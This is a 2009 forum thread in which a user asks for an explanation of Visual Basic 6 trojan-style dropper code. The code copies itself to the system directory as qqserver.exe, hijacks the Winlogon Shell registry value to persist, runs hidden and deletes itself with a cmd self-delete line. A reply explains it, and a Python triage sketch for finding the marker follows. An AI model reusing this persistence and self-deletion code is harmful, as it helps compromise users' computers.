ok100fen posted on 2009-7-10 13:42:46

[Help] Brother Ma, please annotate this code for me, thanks

This code has puzzled me for a long time; please help me annotate it.
Thanks.
Especially this line:
If InStr(StrConv(FileArray, vbUnicode), "|*|") <= 0 Then
Is the file here the file I wrote myself, or qqserver.exe?
Thank you.

```vb
Private Declare Function GetModuleFileName Lib _
        "kernel32" Alias "GetModuleFileNameA" ( _
        ByVal hModule As Long, _
        ByVal lpFileName As String, ByVal nSize As Long) As Long
Private Declare Function GetSystemDirectory Lib _
        "kernel32" Alias "GetSystemDirectoryA" ( _
        ByVal lpBuffer As String, _
        ByVal nSize As Long) As Long

Private Sub Form_Load()
On Error Resume Next
    Dim FileArray() As Byte, SplitLine() As String, ExePath As String

    Open GetMyFileName For Binary Access Read As #1 'Read the contents of the file to be infected
        ReDim FileArray(FileLen(GetMyFileName) - 1)
        Get #1, , FileArray
    Close #1

    ExePath = GetSystemPath & "\qqserver.exe"
    If InStr(StrConv(FileArray, vbUnicode), "|*|") <= 0 Then
        End
    ElseIf Fso.FileExists(ExePath) = False Then
        RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe " & ExePath, "REG_SZ"
        Fso.CopyFile GetMyFileName, ExePath, False
        Shell ExePath, 0
        Shell "cmd /c ping 127.0.0.1&&del /f /q /a:- " & """" & GetMyFileName & """", 0 'Delete itself on first run
        End
    End If
End Sub

'Returns the full path of the running executable (hModule 0 = current module)
Private Function GetMyFileName() As String
On Error Resume Next
    Dim tmp As String * 255
    GetMyFileName = Mid(tmp, 1, GetModuleFileName(0, tmp, 255))
End Function

'Returns the Windows system directory, trimmed at the first null character
Private Function GetSystemPath() As String
On Error Resume Next
    Dim SystemPath As String
        SystemPath = String(255, Chr(0))
        GetSystemDirectory SystemPath, 254
        SystemPath = Left(SystemPath, InStr(SystemPath, Chr(0)) - 1)
        GetSystemPath = SystemPath
End Function
```

马大哈 posted on 2009-11-7 04:17:27

On startup it first reads its own contents into memory:

```vb
Open GetMyFileName For Binary Access Read As #1 'Read the contents of the file to be infected
    ReDim FileArray(FileLen(GetMyFileName) - 1)
    Get #1, , FileArray
Close #1
```

Then it checks whether a certain keyword is present:

```vb
If InStr(StrConv(FileArray, vbUnicode), "|*|") <= 0 Then
```

If it is not present, it exits; otherwise it copies itself to somewhere in the system, writes an autostart entry, and finally deletes the current copy of itself.....

It looks like an EXE that writes parameters into its own tail. If you open this EXE with Notepad you should be able to see the parameters; the marker is |*|.

As for the comment "Read the contents of the file to be infected": either the code was not posted in full and the infection part is missing; or the author of this code does not even know what "infection" means.... or.... he thinks this is "infecting the system" - -!
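Added example, not part of the thread: a Python triage sketch for the pattern the reply describes, an EXE that carries parameters in its tail delimited by `|*|`. It assumes the parameters sit after the last PE section (the overlay); `build_sample` and the field values are constructed for illustration.

```python
import struct

MARKER = b"|*|"  # delimiter named in the thread


def overlay_offset(data: bytes) -> int:
    """Return the file offset where section data ends (start of any overlay)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe, = struct.unpack_from("<I", data, 0x3C)          # e_lfanew
    if pe + 24 > len(data) or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect, = struct.unpack_from("<H", data, pe + 6)     # NumberOfSections
    opt_size, = struct.unpack_from("<H", data, pe + 20) # SizeOfOptionalHeader
    table = pe + 24 + opt_size                          # first section header
    if table + 40 * nsect > len(data):
        raise ValueError("truncated section table")
    end = table + 40 * nsect
    for i in range(nsect):
        # SizeOfRawData and PointerToRawData sit at +16 and +20 of each header
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    return min(end, len(data))


def tail_parameters(data: bytes):
    """Fields found after the last section, split on MARKER; None if no marker."""
    overlay = data[overlay_offset(data):]
    if MARKER not in overlay:
        return None
    return [f.decode("latin-1") for f in overlay.split(MARKER) if f]


def build_sample(overlay: bytes) -> bytes:
    """Constructed minimal PE image (one 512-byte section), for the demo only."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    sect = b".text\0\0\0" + struct.pack("<IIII", 0x200, 0x1000, 0x200, 0x200)
    headers = (dos + coff + b"\0" * 0xE0 + sect + b"\0" * 16).ljust(0x200, b"\0")
    return headers + b"\x90" * 0x200 + overlay


if __name__ == "__main__":
    sample = build_sample(b"|*|field-one|*|field-two|*|")  # constructed values
    print(hex(overlay_offset(sample)), tail_parameters(sample))
```

An overlay on its own is not a finding, since Authenticode signatures are also stored after the last section; it is the marker match inside the overlay that ties a file to the pattern discussed here.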